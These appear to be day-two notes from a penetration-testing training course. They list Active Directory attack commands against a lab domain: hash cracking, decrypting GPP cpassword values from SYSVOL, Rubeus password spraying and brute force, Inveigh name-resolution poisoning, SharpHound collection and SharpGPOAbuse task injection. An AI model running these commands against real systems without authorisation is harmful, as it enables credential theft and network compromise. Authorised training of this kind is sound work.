Day 2 notes from Light Pentest LITE (Live Interactive Training Experience)
More information at https://7minsec.com/services/training/#lplite
Cracking hashes - basic syntax
hashcat name-of-hash-file-to-crack.txt wordlist.txt
Finding vulnerable GPOs with decryptable "cpassword" values:
findstr /S /I cpassword \\tangent.town\sysvol\tangent.town\policies\*.xml
Using Get-GPPPassword.ps1 to find and decrypt the passwords:
Import-Module .\Get-GPPPassword.ps1
Get-GPPPassword.ps1
Getting registry "tweaked" to make CME more pretty:
reg.exe add HKCU\Console /f /v VirtualTerminalLevel /t reg_dword /d 1
Basic CME syntax:
python cme smb IP.OF.A.DOMAINCONTROLLER -u USERNAME -p PASSWORD
Basic spraying:
Rubeus.exe brute /password:PASSWORD-YOU-WANNA-SPRAY-WITH /outfile:output.txt
Example:
Rubeus.exe brute /password:Summer2021 /outfile:summer2021.txt
BRUTE-spraying a specific user with a list of passwords (careful!) and saving any valid creds to a file:
Rubeus.exe brute /user:USER-YOU-WANT-TO-SPRAY /password:TEXT-FILE-FULL-OF-PASSWORDS.txt /outfile:output.txt
Run as an admin prompt:
Inveigh.exe -nbns y -llmnr y -mdns y
Run as an admin prompt:
neo4j console
sharphound -c all -d tangent.town
A sample using SharpGPOAbuse:
SharpGPOAbuse.exe --addcomputertask --taskname "NAME OF YOUR TASK" --author "NAME OF AUTHOR" --command "YOUR COMMAND" --arguments "YOUR ARGUMENTS" --gponame "NAME OF THE VULNERABLE GPO"